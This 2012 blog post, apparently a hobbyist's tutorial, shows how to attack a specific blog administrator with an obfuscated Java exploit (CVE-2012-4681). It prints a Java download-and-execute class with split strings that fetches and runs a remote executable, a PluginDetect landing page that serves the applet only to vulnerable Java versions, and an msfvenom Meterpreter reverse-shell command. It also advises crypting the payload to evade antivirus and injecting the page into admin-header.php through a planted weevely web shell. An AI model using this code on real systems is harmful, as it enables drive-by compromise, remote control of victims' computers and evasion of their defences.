Friday, December 7, 2012

Attacking Windows 8 with Java Exploit and Metasploit

In the last post i was talking about how to obfuscate a Java exploit (CVE-2012-4681 link here), now i want to show you how an attacker can use this obfuscated exploit for a targeted attack.

This is intended to be the second part of Wordpress Cookie Grabber video because i will show what you can do once you have compromised a website, frank's blog in this case. The victim will be only the administrator.

The exploit code in the previous article just escape from java sandbox and launch windows calculator. What we want to do is launch something different, like a meterpreter reverse shell which will connect back to the attacker. Thus in the previous code we have to add a download & execute class/method.

I opted for a new class but you can certainly add a method in the same class. This new class called NewClass (i'm lacking of fantasy) will download a meterpreter executable from a remote host and save it with the name fsc73B8.tmp.exe into temp folder, after that will be executed.

class NewClass
{
    // Directory 
    String t = "java", m = "io", p = "tmpdir", dot = ".";
    // Remote url
    String r1 = "http:", e = "//192", m1 = "168", o = "2.3/fo", t1 = "lder/java", e1 = "exe";
    
    public NewClass()
    {
        String l = System.getProperty( t+dot+m+dot+p ); // get temp folde path
        String r = r1+e+dot+m1+dot+o+t1+dot+e1;
        d( r, l);
    }
    
    private void d(String rPath, String lPath)
    {
        // File name
        lPath += "\\fsc73B8.tmp.";
        try
        {
            URL url = new URL(rPath);
            ReadableByteChannel rbc = Channels.newChannel(url.openStream());
            FileOutputStream fos = new FileOutputStream(lPath+"exe");
            fos.getChannel().transferFrom(rbc, 0, 1 << 24);
            fos.close();

            // execute
            Runtime.getRuntime().exec(lPath+"exe");
            
        } catch( Exception e ){}
    }
}

This two classes will be packed in one jar named java.jar;  now it will be detected by antivirus ?


Link here.

Ok, great it's not detected. In our scenario we have to infect only the administrator (Frank), if he has a vulnerable version of java. To check this we use PluginDetect a powerfull javascript script (used also by Blackhole till version 1.2.5) able to detect all plugins installed on browser.

The page that check this will look like this.

<script src="PluginDetect.js" type="text/javascript"></script>                                                                                                                                  
<script type="text/javascript">                                                                                                                                                                 
                                                                                                                                                                                                
        // detect java plugin                                                                                                                                                                   
        if( PluginDetect.isMinVersion("Java") >= 0 )                                                                                                                                            
        {                                                                                                                                                                                       
                // check version                                                                                                                                                                
                PluginDetect.getVersion(" ");                                                                                                                                                   
                var version = PluginDetect.getVersion("Java");                                                                                                                                  
                                                                                                                                                                                                
                // Affected versions                                                                                                                                                            
                // 170, 1701, 1702, 1703, 1704, 1705, 1706                                                                                                                                      
                version = version.replace(/\s/g, "");                                                                                                                                           
                                                                                                                                                                                                
                if( version.legth == 3 )                                                                                                                                                        
                        version = "1700";                                                                                                                                                       
                                                                                                                                                                                                
                // Convert to int so i can compare                                                                                                                                              
                var intVersion = parseInt(version);                                                                                                                                             
                                                                                                                                                                                                
                // if vulnerable                                                                                                                                                                
                if( intVersion >= 1700 && intVersion <= 1706 )                                                                                                                                  
                {                                                                                                                                                                               

                   document.write("&lt;applet code=\"Java.class\" archive=\"java.jar\"&gt;&lt;/applet&gt;");
                }

        } 
</script>


Now it's time to create a meterpreter tcp reverse shell that connect back to us.

sudo msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=192.168.2.10 LPORT=15000 > meterpreter.exe

As you can image this executable will be detected by most antivirus, even if we use encoders. The best solution would be to create your own crypter since all crypters that you would find online aren't  FUD, because they are public. I don't have time to create my own (and i don't know how to do it), but one day i will. In this page there are few crypters claiming to be Fully Undetectable, i chose 0vcrypter because can bypass Microsoft detection.


Frank lives in the United States and following this chart provided by opswat.com Microsoft Security Essential is the most widespread antivirus. With the default adoption by Windows 8 in the next months this percentage will increase even more.


After crypted our meterpreter shell and renamed java.exe we have all files that we need:
  • page.html (landing page)
  • PluginDetect.js
  • java.jar (exploit)
  • java.exe (meterpreter shell)
Now we can upload all these files to a remote host.

If you remember in the previous video we have left a weevely shell on his site so now we can connect to it and modify admin-header.php located into wp-admin folder.


Now start a meterpreter listener and if we were lucky that frank has a vulnerable version of java, our shell will be dropped correctly.


Once we have a meterpreter session we can do a lot of things but for now just took a screenshot of the desktop.


Enjoy the video.



Reference: